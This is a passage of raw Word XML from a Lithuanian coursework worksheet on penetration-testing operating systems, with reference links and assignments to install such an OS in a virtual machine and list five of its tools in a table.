          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">2020, vasario 10). </w:t>
      </w:r>
      <w:r w:rsidR="75B481EF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Top 10 Operating Systems for Ethical Hackers and Penetration Testers (2020 List)</w:t>
      </w:r>
      <w:r w:rsidR="311571AE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="7AA7B990" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Medium.</w:t>
      </w:r>
      <w:r w:rsidR="7AA7B990" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="59356664" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId107">
        <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://medium.com/lotus-fruit/top-10-operating-systems-for-ethical-hackers-and-penetration-testers-2020-list-b523b611cdbb</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0F208D39" w14:textId="43D24346" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="75C4D811" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Kumar</w:t>
      </w:r>
      <w:r w:rsidR="001E2CAC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> A. </w:t>
      </w:r>
      <w:r w:rsidR="62A1A69F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Top 5 Operating System For Ethical Hacking and Penetration Testing – Download Free. </w:t>
      </w:r>
      <w:r w:rsidR="057D8A4B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Darkwiki.in.</w:t>
      </w:r>
      <w:r w:rsidR="057D8A4B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="59356664" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId108">
        <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.darkwiki.in/top-5-operating-system-for-ethical-hacking-and-penetration-testing/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="10832924" w14:textId="2007B3FB" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="00AB1DA7" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D307EFB" w14:textId="1132A291" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="42890CD5"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10</w:t>
      </w:r>
      <w:r w:rsidR="00605244" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis</w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00D03998" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">NAUDODAMIESI </w:t>
      </w:r>
      <w:r w:rsidR="00733CDE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">VIRTUALIZAVUI SKIRTĄ PROGRAMINĘ ĮRANGĄ </w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>PALEISKITE ARBA ĮDIEKITE VIENĄ IŠ ATSPARUMO TESTAVIMUI SKIRTŲ OPERACINIŲ SISTEMŲ</w:t>
      </w:r>
      <w:r w:rsidR="005E7A35" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>PATEIKITE OPERACINĖS SISTEMOS DARBALAUKIO EKRANO VAIZDĄ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D0071B" w14:textId="454D2FD3" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="00AB1DA7" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62A49B4E" w14:textId="41AB481B" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B5EED2" w14:textId="34BA0096" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="3B908179" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Download VirtualBox. </w:t>
      </w:r>
      <w:r w:rsidR="6FEEDED0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>VirtualBox.</w:t>
      </w:r>
      <w:r w:rsidR="6FEEDED0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="6FEEDED0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId109">
        <w:r w:rsidR="6FEEDED0" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.virtualbox.org/wiki/Downloads</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="050AEC3E" w14:textId="6666A4A7" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="51F70AE3" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">VMware Workstation 16 Player. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>VMware.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="6FEEDED0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId110">
        <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.vmware.com/products/workstation-player/workstation-player-evaluation.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7124E8DB" w14:textId="2218526F" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="2A205786" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Install Hyper-V on Windows 10. </w:t>
      </w:r>
      <w:r w:rsidR="2CBA2F34" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">(2019, vasario 15). </w:t>
      </w:r>
      <w:r w:rsidR="2CBA2F34" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft. </w:t>
      </w:r>
      <w:bookmarkStart w:id="8" w:name="_Hlk61969915"/>
      <w:r w:rsidR="18A0934D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidR="608486E3" w:rsidRPr="005A5C28">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="608486E3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v" \h </w:instrText>
      </w:r>
      <w:r w:rsidR="608486E3" w:rsidRPr="005A5C28">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v</w:t>
      </w:r>
      <w:r w:rsidR="608486E3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EE60E0" w14:textId="2218526F" w:rsidR="00F453A0" w:rsidRPr="005A5C28" w:rsidRDefault="00F453A0" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A89FE0C" w14:textId="1BBBC124" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="42890CD5"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11</w:t>
      </w:r>
      <w:r w:rsidR="00605244" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis</w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>PASIRINKITE VIENĄ IŠ ATSPARUMO TESTAVIMUI SKIRTŲ OPERACINIŲ SISTEMŲ</w:t>
      </w:r>
      <w:r w:rsidR="005E7A35" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. P</w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">ATEIKITE PASIRINKTOJE SISTEMOJE NAUDOJAMŲ PENKIŲ PROGRAMINIŲ ĮRANGŲ PAVADINIMUS </w:t>
      </w:r>
      <w:r w:rsidR="005E7A35" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">IR JŲ </w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>APRAŠYM</w:t>
      </w:r>
      <w:r w:rsidR="005E7A35" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>US</w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. UŽPILDYKITE LENTELĘ.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9915" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1129"/>
        <w:gridCol w:w="2552"/>
        <w:gridCol w:w="6234"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="7CC72B18" w14:textId="77777777" w:rsidTr="009005B3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="6C63021F" w14:textId="40A806ED" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Eil.</w:t>
            </w:r>
            <w:r w:rsidR="4A42ACEC" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Nr.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2552" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="7A0D0C9D" w14:textId="682A6511" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Pavadinimas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6234" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="5485469F" w14:textId="1700DEA0" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Aprašas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="70E01795" w14:textId="77777777" w:rsidTr="009005B3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B085D6F" w14:textId="7534C600" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2552" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="353B5751" w14:textId="0EDC0AF3"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6234" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="332E7413" w14:textId="4D55F055"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3866B169" w14:textId="77777777" w:rsidTr="009005B3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="393CB857" w14:textId="711797CE" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2552" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02FC6BC2" w14:textId="3AFB9C80"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6234" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A762BF7" w14:textId="69A0D2EA"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770D2D7F" w14:textId="77777777" w:rsidTr="009005B3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C938867" w14:textId="3D81205E" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
